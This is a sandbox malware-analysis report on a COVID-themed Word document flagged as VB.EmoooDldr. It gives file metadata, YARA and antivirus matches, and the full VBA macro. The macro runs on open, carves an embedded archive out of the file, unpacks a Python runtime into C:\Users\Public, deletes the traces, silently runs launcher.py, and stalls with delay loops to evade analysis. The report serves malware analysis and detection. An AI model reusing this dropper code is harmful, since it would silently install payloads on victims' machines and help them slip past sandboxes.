VTI SCORE: 100/100
Dynamic Analysis Report
Classification: -
Threat Names: VB.EmoooDldr.2.Gen
VPIyNbbmtoYiYfrB.doc
Word Document
Created at 2020-04-15T11:03:00
Filename | Category | Type | Severity |
---|---|---|---|
C:\Users\FD1HVy\Desktop\VPIyNbbmtoYiYfrB.doc | Sample File | Word Document | Malicious |
Office Information
Creator | Jeremy |
Last Modified By | Jeremy |
Revision | 251 |
Create Time | 2019-11-11 06:20:00+00:00 |
Modify Time | 2020-04-13 19:26:00+00:00 |
Document Information
Codepage | ANSI_Cyrillic |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal.dotm |
Company | SPecialiST RePack |
Document Security | SECURITY_LOCKED |
Editing Time | 264540.0 |
Page Count | 3 |
Line Count | 39 |
Paragraph Count | 11 |
Word Count | 839 |
Character Count | 4787 |
Chars With Spaces | 5615 |
scale_crop | False |
shared_doc | False |
Controls (1)
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020906-0000-0000-C000-000000000046} | Word97 | - |
VBA Macros (1)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
ActiveDocument.ActiveWindow.View.ReadingLayout = False
ActiveDocument.Unprotect "securePass"
show
ActiveDocument.Protect wdAllowOnlyReading, True, "securePass", False, False
Dim data As String
Dim User As String
Dim bla As String
Dim Coper As Object
User = "C:\Users\Public"
Docer = ActiveDocument.FullName
'Copy
Call Shell("cmd /c copy " + Docer + " " + User + "\docer.doc", vbHide)
deay (4)
data = bin2var(User + "\docer.doc")
data = Right(data, 7074638)
var2bin User + "\smile.zip", data
bla = VBA.FileSystem.Dir(User + "\Python37", vbDirectory)
If bla <> VBA.Constants.vbNullString Then
Call Shell("cmd /c rmdir /s /q " + User + "\Python37", vbHide)
deay (2)
End If
'Unzip
Unzip User + "\smile.zip", User, "Python37"
'Clean
Kill User + "\smile.zip"
Kill User + "\docer.doc"
'Run
Call Shell("""" & User & "\Python37\python.exe" & """ """ & User & "\Python37\launcher.py" & """", vbHide)
End Sub
Function bin2var(filename As String) As String
'Which alters when it alteration finds,
'Or bends with the remover to remove.
Dim f As Integer
f = FreeFile()
Open filename For Binary Access Read Lock Write As #f
bin2var = Space(FileLen(filename))
Get #f, , bin2var
Close #f
'O no! it is an ever-fixed mark
'That looks on tempests and is never shaken;
End Function
'It is the star to every wand'ring bark,
'Whose worth 's unknown, although his height be taken.
'Love 's not Time's fool, though rosy lips and cheeks
'Within his bending sickle's compass come;
Sub var2bin(filename As String, data As String)
'If this be error and upon me prov'd,
'I never writ, nor no man ever lov'd.
Dim f As Integer
f = FreeFile()
Open filename For Output Access Write Lock Write As #f
Print #f, data;
Close #f
End Sub
'Love alters not with his brief hours and weeks,
'But bears it out even to the edge of doom.
Sub Unzip(Fname As Variant, DefPath As String, TarFold As String)
Dim oApp As Object
Dim FileNameFolder As Variant
'Root folder for the new folder.
If Right(DefPath, 1) <> "\" Then
DefPath = DefPath & "\"
End If
'Create the folder name
strDate = Format(Now, " dd-mm-yy h-mm-ss")
FileNameFolder = DefPath & TarFold & "\"
'Make the normal folder in DefPath
MkDir FileNameFolder
'Extract the files into the newly created folder
Set oApp = CreateObject("Shell.Application")
oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, 4
End Sub
Sub hide()
ActiveDocument.Sections(1).Range.Font.Hidden = False
For Each Section In ActiveDocument.Sections
If Section.Index > 1 Then Section.Range.Font.Hidden = True
Next
End Sub
Sub show()
ActiveDocument.Sections(1).Range.Font.Hidden = True
For Each Section In ActiveDocument.Sections
If Section.Index > 1 Then Section.Range.Font.Hidden = False
Next
End Sub
Function deay(min)
Dim ptr
ptr = DateAdd("s", min, Time())
If ptr > Time() Then
Do Until (Time() > ptr)
Loop
End If
End Function
Document Content Snippet
W l "] ) ) ) ) ) ) ) ) g g ) ) ) ) ~g ) ) ) ) l ) ) ) ) ) ) ) ) ) \ m : C O V I D - 1 9 s Yb Yb i n d Yn a ... |
Local AV Matches (1)
Threat Name | Severity |
---|---|
VB.EmoooDldr.2.Gen | Malicious |
YARA Matches (2)
Rule Name | Rule Description | Classification | Score |
---|---|---|---|
VBA_Execution_Commands | VBA macro may execute files or system commands | - | 3/5 |
VBA_Time_Delay_Loops | VBA macro utilizes time delay loops; possible impact upon dynamic analysis | - | 1/5 |